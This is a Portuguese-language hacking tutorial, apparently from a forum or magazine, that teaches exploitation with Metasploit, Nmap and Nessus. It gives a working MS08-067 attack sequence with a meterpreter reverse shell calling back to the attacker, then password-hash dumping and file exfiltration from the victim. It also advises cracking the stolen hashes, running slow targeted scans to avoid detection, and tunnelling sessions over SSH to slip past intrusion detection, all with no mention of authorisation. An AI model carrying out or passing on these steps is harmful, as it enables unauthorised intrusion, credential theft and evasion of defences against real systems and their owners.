Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
que no possa ser usado como guia total para um ataque, visto cobrir todo o percurso de
exploitation. Mas basta seleccionar outros exploits para as novas coisinhas...
Vejam tambm a, digamos, o irmo web que a excelente w3af "Web Application Attack
and Audit Framework."
Apesar do metasploit tambm estar preparado para ataques web, mas eu especializei-me
nos dois e melhor trabalhar com as duas em conjunto.
O metasploit possui vrias ferramentas dentre elas: (e muitas mais para vocs
explorarem... explorem os payloads, os exploits e todos os outros utilitrios. Podem fazer-lo
lendo ou explorando nos ficheiros ou com comandos do tipo "show payloads" ou "show
exploits", entre outros.)
msfconsole - metasploit em modo console
msfcli - interface de automatizao de penetrao e explorao
msflogdump - exibe sesses de arquivos de log
msfplayload - usado para gerar payloads customizados
msfpescan - utilizado para analisar e descompilar executveis e DLLs
msfencode - um codificador interactivo de payload encoder
msfupdate - utilizado para verificar e fazer download de actualizao do framework
msfweb - Interface grfica via browser
Hoje devido ao facto do metasploit estar na Rapid7 podem usar uma verso gratuita do
detector de vulnerabilidades automtico, o NeXpose Community Edition... ele detecta as
vulnerabilidades e integra-se com o metasploit.
Nexpose (Detector de vulnerabilidades)
http://www.rapid7.com/vulnerability-scanner.jsp
Podem, como eu, usar o Nessus para isso ou outras ferramentas... hoje at o nmap tm
scripts para detectar vulnerabilidades, que so a principal questo no exploitation... a
partir de uma vulnerabilidade que tudo acontece e precisam saber a verso exacta do
software alvo e do SO... em alguns casos no windows at a lngua em que o windows esta.
Algo essencial para se escolher o exploit certo saber o servio e a verso exacta do
mesmo, pois os exploits so feitos nessa base. Para tal e se soubermos j que h uma
vulnerabilidade para um apache 2 verso anterior 2.15, podemos fazer um scan
especifico com o Nmap a essa porta (80) para no dar nas vistas. como se alguem
tivesse a aceder ao site, pois apenas so enviados pacotes para a porta 80. Se fizerem um
scan a todas as portas e houver algum equipamento de jeito no caminho vai detectar que
um scan e corta. Saibam o que procurar e no faam scans a todas as portas, a no ser
que no haja qualquer equipamento especial, como acontece na maioria dos datacenters
para as contas mais baixas. As mais usadas.
Nmap sT P0 A version-all T0 p 80 ipalvo
(o T0 para que haja maior espao de tempo entre o envio de pacotes, para dificultar a
deteco. Mas no uma tcnica de evaso e pode ser dispensado. O Nmap tm diversas
tcnicas de evaso, como spoofing, etc... explorem a documentao)
Nessus (Detector de vulnerabilidades)
http://www.nessus.org/nessus/
O Nessus um motor que interpreta scripts em NASL (ver artigo meu na 3 Edio - Julho
de 2006 que explica melhor esta linguagem) e envia-os contra um ou mais alvos, fazendo
um relatrio dos resultados. Estes scripts procurar milhares de vulnerabilidades, mas
apensa as conhecidas. Podem desenvolver os vossos prprios scripts NASL para coisas
novas.
Voltando ao Metasploit, eu vou ensinar aqui a utilizar somente trs destas
ferramentas(msfconsole, msfcli, msfweb), pois acredito que um verdadeiro :smoke:
aprender sozinho o restante... como sempre dou a base para futuras exploraes. Ajuda
ao ensino e evita script kiddies
msfconsole:
Primeiramente digita-se na linha de comando :
[root]#./msfconsole
se for no windows s digite msfconsole sem ./, continuando dever aparecer algo como:
(neste caso j foi usado o comando show exploits para se ter uma lista dos exploits. O
comando show serve para outras coisas como payloads e opes. Ver em detalhe)
Para quem d o primeiro passo pode executar o comando help para ver os comandos de
consola. Ateno que isto so apenas os comandos de consola e no todas as suas
funcionalidades.
Como vimos na primeira imagem do mestasploit e a nivel formativo, pois no mundo a srio
j sabero que exploit usar, ser: show [opo] (a opo poder ser uma das que vos
aparecero seno digitarem nenhuma, como podem ver no exemplo em seguida
desta forma:
msf > show
msfconsole: show: requires an option: 'exploits', 'payloads',
'encoders', or 'nops'
msf >
Viram que apareceram as opes deste comando. O mesmo acontece com outros
comandos, pois podem ir assim explorando a framework.
Para saberem quais os exploits que existem nesta framework (desde a ultima actualizao,
devem ir actualizando o metasploit que est em constante evoluo) basta digitar o
comando:
msf >show exploits;
Para saber os payloads que existem neste framework basta digitar o comando: show
payloads e assim por diante.
Ento dentro do ambiente do metasploit escolhemos o exploit assim com o comando use:
Exploit:
-------required
required
Por exemplo. Como fazer o dump das hashes das passowrds com o meterpreter e fazer o
download para depois as crackarem com algum dos programas anteriormente
mencionados.
.MSFConsole
> use windows/smb/ms08_067_netapi
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST (meu Ip)
> set RHOST (Ip Remoto)
> exploit
> getuid
> hashdump
> use -f cmd -c
Para fazer downloads ou uploads dentro do meterpreter, entre o vosso PC e o alvo
comprometido.
meterpreter> download arquivo1 arquivo2 pastaDestino
meterpreter> upload arquivo1 arquivo2 pastaDestino
Para crackar as hashes eu uso o LOphtCrack. s guardar o resultado do "hashdump"
num .txt (meuHash.txt) e usa-lo no LOphtCrack. Garanto que tero algumas passwords
interessantes.
(investiguem tambm a familia Pwdump... muito interessante para certas situaes.)
Citao
pwdump is the name of various Windows programs that output the LM and NTLM password
hashes of local user accounts from the Security Account Manager (SAM). In order to work,
it must be run under an Administrator account, or be able to access an Administrator
account on the computer where the hashes are to be dumped; so Pwdump does not
compromise security. Most of these programs are open-source.
http://en.wikipedia.org/wiki/Pwdump (aqui so explicadas as vrias cores e sabores e
seus links)
Vamos passar para uma forma ainda mais fcil. Garanto que o ppl mais windows vo
adorar esta forma, que um GUI (Grafical User Interface... mas no mundo dos exploits?
Sim... vejam)
Trata-se da ferramenta msfweb que quando executado permite fazermos tudo por uma
pagina web, todas as funcionalidades aplicaveis esto l.
Para acederem ao GUI do metasploit faam:
[root]#./msfweb
+----=[ Metasploit Framework Web Interface (ip:55555)
Deixar correr... Abrir em seguida o browser e digitar o url: teu ip, localhost, 127.0.0.1...
Mais a porta 55555
Seria assim: http://localhost:55555
E assim vero a magia desta ferramenta. Um rico GUI onde facilmente qualquer um pode
configurar uma sesso completa, sem digitar comandos em consolas. Claro que no alvo
vo (ou no) usar a consola, pois mais...
Poderemos com isto fazer tudo graficamente sem digitar comandos etc etc, somente
seleccionando.
Para complementar e devido a essas novas IPS e IDS que detectam padres de trfego e
podem ser actualizadas com as assinaturas dos novos exploits, aqui fica um extra
dedicado s novas appliances PANDA
Com um tunnel SSH o trfego vai encriptado e no possvel identificar o mesmo, o que
vai dentro dessa sesso.
uma das mais usadas tcnicas de evaso,
Criando uma sesso meterpreter persistente sobre um tnel SSH (integrando com o
metasploit)
http://secnow.wordpress.com/2010/04/01/criando-uma-sessao-meterpreter-persistente-apartir-de-um-tunel-ssh/
Podem ver muitos videos que at j apresentei alguns, com tudo isto em "real" e muito
mais... investiguem por ai, pois h magia no ar
teckV